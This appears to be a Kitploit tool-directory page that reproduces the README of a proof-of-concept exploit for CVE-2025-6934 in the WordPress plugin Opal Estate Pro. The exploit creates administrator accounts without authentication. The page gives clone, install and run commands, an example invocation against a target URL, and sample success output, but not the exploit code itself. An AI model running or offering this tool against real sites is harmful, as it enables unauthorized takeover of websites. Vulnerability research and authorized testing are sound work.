Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-6934 — Automated PoC exploit for WordPress Opal Estate Pro that detects vulnerable versions, retrieves nonce, and creates unauthorized administrator accounts. | Kitploit
Tools/GitHubGitHub/rosemary1337/cve-2025-6934
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingRed TeamingArchived
GitHubrosemary1337/cve-2025-6934

CVE-2025-6934

Automated PoC exploit for WordPress Opal Estate Pro that detects vulnerable versions, retrieves nonce, and creates unauthorized administrator accounts.

View Repository
21 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-6934 Auto Exploit

Python Status Author


⚡ Overview

CVE-2025-6934 is a proof-of-concept (PoC) exploit targeting WordPress Plugin: Opal Estate Pro ≤ 1.7.5.
This exploit demonstrates unauthenticated administrator account creation.

Disclaimer: This PoC is for educational purposes only. Do not use on systems without permission.


🛠 Features

  • Detect plugin version automatically.
  • Retrieve required nonce for registration.
  • Create a new administrator account without authentication.
  • Colorful console output with status, success, failure, and info messages.
  • Works on Python 3.x with minimal dependencies.

⚙️ Installation

  1. Clone the repository:
root@kitploit:~
git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934
  1. Install dependencies:
root@kitploit:~
pip install -r requirements.txt

Requirements: requests, beautifulsoup4, colorama


🚀 Usage

root@kitploit:~
python3 main.py -u <TARGET_URL> -mail <EMAIL> -password <PASSWORD> -user <USERNAME>

Example:

root@kitploit:~
python3 main.py -u http://site.com/ -mail [email protected] -password 3xplo1tI5Fun -user r1337

Arguments

FlagDescriptionRequiredDefault
-u, --urlTarget site URLYes-
-mail, --newmailEmail for new adminYes-
-password, --newpasswordPassword for new adminYes-
-user, --usernameUsername for new adminNoadministrator

🎨 Output

The console shows:

  • Status messages [•]
  • Success [✔]
  • Fail [✖]
  • Info [i]

Example:

root@kitploit:~
[•] Starting Exploit...
[✔] Nonce Found: xyz123
[✔] Exploit Successful!
    Username : r1337
    Email    : [email protected]
    Password : 3xplo1tI5Fun
    Role     : administrator

🔐 Security & Disclaimer

  • For educational & testing purposes only.
  • Do not attack websites without explicit permission.
  • Use in a controlled lab or authorized penetration test only

🔗 Connect with Me

I'm an active developer who enjoys building tools and sharing knowledge. You can reach me through:

Download Tool